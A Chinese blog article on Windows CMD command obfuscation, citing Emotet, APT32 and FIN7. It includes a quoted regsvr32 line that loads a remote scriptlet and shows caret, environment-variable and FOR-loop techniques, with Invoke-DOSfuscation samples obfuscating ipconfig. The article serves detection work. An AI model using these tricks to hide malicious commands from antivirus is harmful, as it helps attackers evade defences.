zoukankan      html  css  js  c++  java
  • CMD命令混淆高级对抗

    一. 背景

    首先要说一下攻击者为什么会使用CMD命令混淆,它的目的是什么?首先举几个现实中的例子:

    1. Emotet木马

    Emotet一款著名的银行木马,首次出现于2014年年中。该木马主要通过垃圾邮件的方式传播感染目标用户,并通过脚本混淆、加密或编码方式来绕过AV检测,比如在垃圾邮件word附件中使用宏攻击, 如下图所示,这是一个从DOC文档嵌入的VBA宏代码中提取的CMD命令,乍一看上去,像是无意义的一串字符。

    2. APT32

    APT32在使用regsvr32.exe 远程注册组件,使用混淆方式来逃避C2检测。

    regsvr32.exe /s /n /u /i:”h”t”t”p://<REDACTED>.jpg scrobj.dll

    3. FIN7

     

    FIN7 在使用LINK文件钓鱼时,对命令参数进行混淆:

     

    APT攻击中使用混淆姿势多种多样,主要是通过混淆对抗静态检测,AV无法提取敏感参数,C2地址,从而实现绕过。同时也会加大安全人员对内容的分析难度。

    做过安全策略的同学,肯定会想到 对cmd.exe的进程链进行监控,这样就不用管命令是否混淆,当然这是一种很好的方式,但是并不能将所有场景覆盖。cmd自身有很多内置命令,根本不会产生子进程,同样威胁很大,因此对CMD命令混淆的检测和还原非常重要。

    功能

    使用

    File copy

    cmd /c copy powershell.exe benign.exe

    File deletion

    cmd /c del benign.exe

    File creation

    cmd /c “echo LINE1 > bad.vbs&&echo LINE2 >> bad.vbs”

    File read

    cmd /c type HOSTS

    File modification

    cmd /c “echo 127.0.0.1 www.baidu.com >> HOSTS”

    File listing

    cmd /c dir “C:Program Files*”

    Directory creation

    cmd /c mkdir %PUBLIC%Recon

    Symbolic link creation

    cmd /c mklink ClickMe C:UsersPublicevil.exe

    二.CMD命令的混淆姿势

    利用大小写与特殊字符进行混淆

    在CMD中,CMD命令大小写并不敏感,ping = PINg = PING :

    常用来混淆命令的特殊字符主要有以下四种:

    1.字符“^”是CMD命令中最常见的转义字符,该字符不影响命令的执行。在cmd环境中,有些字符具备特殊功能,如 >、>>表示重定向,| 表示管道,&、&&、|| 表示语句连接,它们都有特定的功能。如果需要把它们作为字符输出的话,就需要对这些特殊字符做转义处理:在每个特殊字符前加上转义字符^。举个例子:echo ^>、echo ^|、echo ^|^|、echo ^^ 和c^m^d。

    2.逗号“,”和分号 “;”可以互换,可以取代命令中的合法空格,多个空格也不影响命令执行。

    3.成对的圆括号()也会出现在命令参数中,也不影响命令的执行。圆括号表示嵌入子命令组,同样被cmd.exe参数处理器进行解释。

    4.双引号 。使用双引号包裹字符,相当于将字符进行连接。

    利用环境变量进行混淆

    cmd.exe的环境变量分为系统已有的环境变量和自定义变量。利用环境变量的值中的字符或字符串,可以拼接成黑客需要的cmd命令,并逃避静态检测。在cmd中 ,set命令用来显示、设置或删除cmd.exe环境变量。命令格式:

    SET [variable=[string]]

    • variable 指定环境变量名。
    • string 指定要指派给变量的一系列字符串。

    在命令行中输入 set,会列举出cmd.exe中所有的环境变量,其中比较有意思的是%ComSpec%变量,值默认为“C:WINDOWSsystem32cmd.exe”。

    我们可以利用系统中已有的环境变量,通过对环境变量进行截取拼接出想要的cmd命令。格式:

    %VarName:~offset[,length]%

    主要用于获取环境变量VarName的变量值,偏移offset字节之后长度为length个字节。[,length]可省略。offset 默认下标从0开始,offset也支持负数,表示反向遍历字符串的下标。举个例子:通过%comspec%截取出cmd.exe。

    通常我们也可以自定义一个或者多个环境变量,利用环境变量值中的字符,提取并拼接出最终想要的cmd命令。如:

    cmd /c “ set envar1=ser&& set envar2=ne&& set envar3=t u&&call echo %envar2%%envar3%%envar1%”

    备注:Cmd /C “string”表示:执行字符串string指定的命令,然后终止。

    在上图中,/V:ON参数 可以启用延迟的环境变量扩展。当/V:ON参数启用时,可以不使用call命令来扩展变量,使用 %var% 或 !var! 来扩展变量,!var!可以用来代替%var%。

    cmd /V:ON /C " set envar1=ser&& set envar2=ne&& set envar3=t u&& call echo !envar2!!envar3!!envar1!"

    cmd.exe内部命令除了set,还有 assoc ,ftype等。我们可以使用这些内部命令产生的信息,拼接出我们想要的cmd命令。

    assoc:文件名扩展关联命令,用于显示和设置文件名扩展关联,可以指定某种后缀名的文件按照特定的类型文件打开或执行。命令格式为:

    assoc [.ext[=[fileType]]]

    ftype:显示或修改用在文件扩展名关联中的文件类型,指定一种类型的文件默认用哪个程序运行或打开。命令格式为:

    ftype [fileType[=[openCommandString]]

    利用For循环拼接命令

    For循环经常被用来混淆处理cmd命令,使得cmd命令看起来复杂且难以检测,属于混淆中比较高阶的用法。

    在For循环使用过程中,最常用的参数是 /F 和/L。

    FOR /L %variable IN (start,step,end) DO command [command-parameters]
    
    该集表示以增量形式从开始到结束的一个数字序列。因此,(1,1,5)将产生序列12345,(5,-1,1)将产生序列(54321)
    
    FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
    FOR /F ["options"] %variable IN ("string") DO command [command-parameters]
    FOR /F ["options"] %variable IN ('command') DO command [command-parameters]

    举个例子,看一下For循环是如何生成命令的:

    for /f " delims=f= tokens=2" %f IN ( 'assoc .cmd' ) do %f

    • delims=f= :以f 与 = 进行分隔字符串
    • tokens=2 :选择分隔后的第二列

    将assoc .cmd 的返回内容拆分后,第二列正好是cmd,最后的结果就是执行cmd。

    混淆神器

    基于上述的原理,安全大牛创造了专门的CMD命令混淆工具,高深的命令混淆批量生产,卖成了白菜价。

    https://github.com/danielbohannon/Invoke-DOSfuscation

    混淆分为三个等级,以ipconfig命令为例子:

    1.初级 简单通过环境变量进行混淆

    cmd /C"set 4i=ipc&&set E3z=onfig&&call set sfkl=%4i%%E3z%&&cmd.exe /C %sfkl%"

    2.中级

    ^c^M^D, , , , /^c", ,(, , , , , (s^et ^ w^3=i^pco) , )&& (S^Et ^ eH^P=n^fig)& , , C^aLl, sE^t GyHE=%w^3%%eH^P%& , , %LoCaLAPpdata:~ -3,+1%%pRoGramw6432:~9,1%d, ,/^R, , %Gy^HE%"

    3.高级

    ^F^o^r; /^F ; , " delims=i=f tokens=2 " ,,%^2, IN; ( ,; ' ; , ^^A^^ssoC ,.cmd '; ; ) ; , ^DO ; ,%^2; ;M, , QbYcFKyL5/R "; ;(^se^T ^ ^ -,^]=^p)&&(,,,(s^e^T^_^*=^i);;)&&(^s^E^T^^@,+=^f)&& (^S^Et ^ ^{^+%&&; ^C^A^LL,E^C^Ho; %^@^}%"|, ; F^Or , /^f ;;"tokens= 1 delims=qfNzR" , ; %^D ; ^In ; (; ; ' ;, ^^^^Ft^^^^YP^^^^E ; ,^^^|; ,^^^^F^^^^iN^^^^Dst^^^^R,^^^^c^^^^m ' ; ); , ^d^O, , %^D;

  • 相关阅读:
    Delphi制作带图标的弹出式选单 DELPHI
    在DBGrid中实现Copy、Paste功能 DELPHI
    使用stringgrid的例子 DELPHI
    取得某一dll所有输出函数名 DELPHI
    HDOJ 2512 一卡通大冒险
    POJ 2533 Longest Ordered Subsequence
    UVA 10795 A Different Task
    HDOJ 1505 City Game
    HDOJ 1864 最大报销额
    HDOJ 1421 搬寝室
  • 原文地址:https://www.cnblogs.com/nongchaoer/p/13054822.html
Copyright © 2011-2022 走看看